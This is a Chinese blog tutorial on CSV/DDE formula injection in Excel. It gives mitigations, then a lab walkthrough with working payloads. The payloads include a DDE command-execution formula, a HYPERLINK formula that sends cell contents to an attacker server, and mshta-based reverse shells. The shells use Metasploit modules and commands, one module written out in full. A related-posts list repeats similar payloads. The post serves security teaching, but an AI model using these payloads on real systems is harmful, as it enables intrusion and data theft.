CSV注入

已于 2022-10-08 22:02:18 修改
阅读量4.4k 收藏 14
点赞数 2
文章标签: web 渗透测试
于 2021-11-25 17:40:06 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/lzz710107110/article/details/121542878
版权

这里写目录标题

漏洞简介:

CSV注入(CSV Injection)漏洞通常会出现在有导出文件(.csv/.xls)功能的网站中。当导出的文件内容可控时,攻击者通常将恶意负载(公式)注入到输入字段中,用户导出文件打开后,EXCEL会调用本身的动态功能,执行攻击者的恶意代码,从而控制用户计算机。

漏洞原理:

在xls表格中,输入=1+1,回车后看到表格变成2,+号被当作运算执行了
不只是+号, = 、- 、@这三个符号也会被excel解析成共事

在这里插入图片描述
DDE(Dynamic Data Exchange)协议:
DDE是Windows下进程间通信协议,是一种动态数据交换机制,使用DDE通讯需要两个Windows应用程序,其中一个作为服务器处理信息,另外一个作为客户机从服务器获得信息。DDE支持Microsoft Excel,LibreOffice和Apache OpenOffice。 Excel、Word、Rtf、Outlook都 可以使用这种机制,根据外部应用的处理结果来更新内容。因此,如果我们制作包含DDE公式的CSV文件,那么在打开该文件时,Excel就会尝试执行外部应用

  • 较老的版本如office 2016 MSO(16.0.4266.1001)默认使用该协议
  • 新版本需要手动开启配置:文件->选项->信任中心->信任中心设置->外部内容->启用动态数据交换服务器启动
    在这里插入图片描述

防御方法:

这种攻击很难缓解,并且从许多漏洞赏金计划中都明确禁止了这种攻击。
1、 禁止特殊符号
请确保没有任何单元格以下列任何字符开头:
等于(“ =”)
加号(“ +”)
减号(“-”)
在 (”@”)
2、 点引号保护
单元格的开头添加单引号’,表示excel中该单元格不包含公式,并且在查看MS Excel时,在单元格中作为第一个字符输入时不会显示

实验

1.本地复现

在单元格输入:=1*cmd|’ /C calc’!‘A1’ //cmd /c执行cmd命令后关闭窗口
出现安全提示的弹窗,点击是,就会弹出计算器
在这里插入图片描述
在这里插入图片描述

2.恶意网站(钓鱼)

在单元格输入:=HYPERLINK(“http://baidu.com”,“点我去百度”) // hyperlink,超链接函数
用户点击文字,会自动打开默认浏览器访问百度页面,无警告
在这里插入图片描述
可以配合IE浏览器漏洞、Flash等漏洞获取shell
CVE-2018-8174
CVE-2018-4878

3.窃取单元格信息

开启kali的web服务:service apache2 start
web日志:/var/log/apache2/access.log
单元格输入:=HYPERLINK(“http://192.168.200.140//”&D2&D3,“Error: Please click me!”)
用户点击访问后,把D2、D3内容以访问文件形式发送给攻击者,攻击者查看web日志可获取信息
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述

CVE-2018-10504
CVE-2019-15092

3.反弹shell-1

kali(攻击机):192.168.200.140
靶机(win10):192.168.200.150
使用模块:exploit/windows/fileformat/office_word_hta
payload/windows/meterpreter/reverse_http
加载模块office_word_hta
在这里插入图片描述
设置payload
use payload/windows/meterpreter/reverse_http
set lhost 192.168.200.140 #kali的IP
set ExitSession false
exploit
在这里插入图片描述
在这里插入图片描述
靶机win10新建表格,内容插入+1+cmd|‘/c mshta.exe http://192.168.200.140:8080/default.hta’!A0
表格弹出提示框,点击确认后,win10上线
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述

4.反弹shell-2

kali(攻击机):192.168.200.140
靶机(win10):192.168.200.150
代码出处

##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
  
  
class MetasploitModule  < Msf::Exploit::Remote
  Rank = NormalRanking
  
  include Msf::Exploit::Remote::HttpServer
  
  def initialize(info  = {})
    super(update_info(info,
      'Name' => 'Microsoft Office Payload Delivery',
      'Description' => %q{
        This module generates an command to place within
        a word document, that when executed, will retrieve a HTA payload
        via HTTP from an web server. Currently have not figured out how
        to generate a doc.
      },
      'License' => MSF_LICENSE,
      'Arch' => ARCH_X86,
      'Platform' => 'win',
      'Targets' =>
        [
          ['Automatic', {} ],
        ],
      'DefaultTarget' => 0,
    ))
  end
  
  def on_request_uri(cli, _request)
    print_status("Delivering payload")
    p = regenerate_payload(cli)
    data = Msf::Util::EXE.to_executable_fmt(
      framework,
      ARCH_X86,
      'win',
      p.encoded,
      'hta-psh',
      { :arch => ARCH_X86, :platform => 'win '}
    )
    send_response(cli, data, 'Content-Type' => 'application/hta')
  end
  
  
  def primer
    url = get_uri
    print_status("Place the following DDE in an MS document:")
    print_line("mshta.exe \"#{url}\"")
  end
end

将ruby文件放置到kali的msf目录:/usr/share/metasploit-framework/modules/exploits/windows/smb/msh_shell.rb
启动数据库:service postgresql start
启动msf:msfconsole
重置数据库:reload_all
查询新建msh_shell模块:search msh_shell
加载 msh_shell模块:use exploit/windows/smb/msh_shell 或者 use 0
设置监听payload:
set payload windows/meterpreter/reverse_tcp
set lhost 192.168.206.128(kali的IP)
set uripath csv
exploit
在这里插入图片描述
win10新建excel,单元格插入+1+cmd|‘/c mshta.exe http://192.168.200.140:8080/csv’!A0
在这里插入图片描述

点击确定后(杀软会提示,再次点击允许),win10就上线了
在这里插入图片描述
在这里插入图片描述
连接shell,输入dir可看到当前目录及文件
在这里插入图片描述
输入shell,进入cmd命令
在这里插入图片描述

xiao__caicai
关注
  • 2
    点赞
  • 14
    收藏
    觉得还不错? 一键收藏
  • 3
    评论
专栏目录
【漏洞挖掘】——46、 CSV注入实践操作
Fly_鹏程万里
06-07 30
CSV公式注入(CSV Injection)是一种会造成巨大影响的攻击向量,攻击这可以向Excel文件中注入可以输出或以CSV文件读取的恶意攻击载荷,当用户打开Excel文件时,文件会从CSV描述转变为原始的Excel格式,包括Excel提供的所有动态功能,在这个过程中,CSV中的所有Excel公式都会执行,当该函数有合法意图时,很易被滥用并允许恶意代码执行。
应用安全系列之十:CSV注入
jimmyleeee的专栏
03-03 4760
本系列文章主旨在于介绍一些漏洞类型产生的基本原理,探索最基础的解决问题的措施,不排除有些语言或者系统提供的安全的API可以更好地更直接地解决问题,也不排除可以严格地输入验证来解决。 关于CSV注入,可能平时关注的人比较少,不过,只要有以csv文件格式导出数据,它就可能存在。很多系统都会导出csv,将数据用于分析。 首先介绍一下CSV的含义,CSV就是comma-separated-values,就是使用逗号分开的一串值,当使用excel打开时,逗号隔开的内容会被展开为对应行和列的一个cell的值。 ..
Web 安全之 CSV 注入攻击详解
最新发布
Innocence_0的博客
04-17 1078
CSV 是一种简单的文件格式,用于存储表格数据,每行一个数据记录,每个记录由逗号分隔的多个字段组成。CSV文件因其简单性和跨平台性而被广泛使用,在数据导出和导入中尤其常见。CSV 注入攻击是攻击者通过某些方式在 CSV 文件中注入恶意的代码,并利用电子表格软件处理 CSV文件时的特性来执行恶意代码实现非法操作的攻击方式。这种攻击通常发生在应用程序在处理 CSV文件时,没有正确地校验或转义用户输入的特殊字符,从而被攻击者利用在 CSV 文件中注入恶意代码。
CSV Injection (CSV 注入攻击)
cwxbox
01-28 1138
CSV注入,也称为公式注入,发生在网站在CSV文件中嵌入不可信输入时。当使用电子表格程序(如Microsoft Excel或LibreOffice Calc)打开CSV时,所有以=开头的单元格都会被软件解释为一个公式。
csv命令注入示例1111111111111111
02-13
csv命令注入示例1111111111111111
JAVA项目实践,URL存在跨站漏洞,注入漏洞解决方案.docx
10-26
JAVA项目实践,URL存在跨站漏洞,注入漏洞解决方案.docx
VB读CSV到mysql_VB读取CSV到mysql_源码
09-30
可能需要使用参数化查询以防止SQL注入。 5. **事务处理**:为了确保数据的完整性和一致性,可能会使用数据库事务来批量处理数据插入。 6. **错误处理**:编写错误处理代码,捕获可能出现的问题,如网络中断、...
java_cvs_解析
07-31
解析cvs
Shell脚本批量添加CSV数据到MySQL
07-23
2. SQL注入:在构建动态SQL语句时,避免SQL注入攻击,可以使用参数化查询或预编译语句。 3. 错误处理:在脚本中加入错误检查和处理机制,如捕获并记录执行失败的行。 4. 批量插入:为了提高性能,可以考虑使用批量...
decs:Diergo Easy CSV Streamable
03-22
由于这些工具没有直接的依赖关系,因此您可以通过创建新的lambda或功能接口并将其注入到映射和过滤器中来简单地扩展它以满足您的需要: BiConsumer< String> logger = (line, error) - > LoggerFactory ....
安全测试 csv 注入
weixin_46202430的博客
03-09 362
csv 注入 用户下单时,收货人姓名为 =cmd|A1!A1 ,下单后 在订单系统可导出订单到csv , 则=cmd|A1!A1 则在csv 的收货人列中的某单元格中, 是可以触发打开cmd 的,黑客是可以通过cmd 做一些危险操作,比如: =+1+cmd|’/c mshta.exehttp://192.168.233.102:8080/a’!A0 =HYPERLINK(“http://vps_ip?test=”&A2&A3,“Error: Please click me!”) 这.
csv注入文件
HoAd'blog
08-06 587
攻击者通过在CSV文件中构造恶意的命令或函数,使得正常用户在使用Excel打开这个CSV文件后恶意的命令或函数被执行,从而造成攻击行为。 原因 1、CSV文件中的几个特殊符号“+、-、@、=” 尝试在CSV单元格中输入“=1+1”,回车后,发现单元格的值变成了2,说明加号被当做运算执行了。 除了加号,“-”、“@”、“=”也会被解释为公式。 2、DDE(Dynamic Data Exchange) DDE是Windows下进程间通信协议,是一种动态数据交换机制,使用DDE通讯需要两个Windows应用程序,
CSV注入漏洞原理及利用教程
凝聚力安全团队
10-24 8707
参考链接 https://blog.csdn.net/qq_34304003/article/details/87635582 https://www.freebuf.com/vuls/195656.html
csv注入java怎么解决_csv注入利用和绕过总结
weixin_28802509的博客
02-27 2134
csv注入csv注入是一种将包含恶意命令的excel公式插入到可以导出csv或xls等格式的文本中,当在excel中打开csv文件时,文件会转换为excel格式并提供excel公式的执行功能,会造成命令执行问题。漏洞原理漏洞原理就是excel的一个特性,当单元格中内容以=-+@等符号开头时,excel将会将其当成一个公式处理。所以当我们输入=1+1时,excel会自动将其计算那么利用这个办法,把等...
csv注入java怎么解决_csv注入复现代码
weixin_29443201的博客
02-27 483
以下代码生成的csv文件,使用Microsoft Execl能成功弹出计算器,虽然打开时有安全提示,但是大多数src还是会接收该类漏洞--------------------------------------------------------------------------------------------package jinqi;public class User {private ...
java中如何对CSV注入进行输入验证、输出过滤以及使用安全的CSV解析库
06-09
在Java中,可以通过以下方式来对CSV注入进行输入验证、输出过滤以及使用安全的CSV解析库: 1. 输入验证 在读取CSV数据之前,应该对用户输入进行验证,主要包括以下方面: - 数据类型:验证输入数据的类型是否正确,例如字符串、整数、浮点数等。 - 数据长度:验证输入数据的长度是否在合法范围内,例如限制字符串长度。 - 数据格式:验证输入数据的格式是否符合要求,例如日期格式、邮箱格式等。 - 特殊字符:验证输入数据中是否包含特殊字符,例如单引号、双引号、分号等。 可以使用Java自带的正则表达式库或者第三方库进行输入验证。 2. 输出过滤 在输出CSV数据之前,应该对数据进行过滤和转义,主要包括以下方面: - 特殊字符:对输出数据中的特殊字符进行转义,例如单引号、双引号、分号等。 - HTML标签:对输出数据中的HTML标签进行转义,以防止攻击者注入恶意代码。 - 敏感数据:对输出敏感数据进行模糊处理或者隐藏,以保障用户的隐私。 可以使用Java自带的字符串处理函数或者第三方库进行输出过滤和转义。 3. 使用安全的CSV解析库 在Java中,可以使用一些开源的CSV解析库,例如Apache Commons CSV、OpenCSV等,这些库提供了安全可靠的CSV解析功能,并且自动进行输入验证和输出过滤,避免了手动处理数据带来的不安全因素。 使用这些库时,应该注意版本更新,及时更新到最新版本,以保障系统的安全性。 综上所述,对CSV注入进行输入验证、输出过滤以及使用安全的CSV解析库是保障系统安全的重要措施,开发人员应该注重安全性,保障用户数据的安全。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 3
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值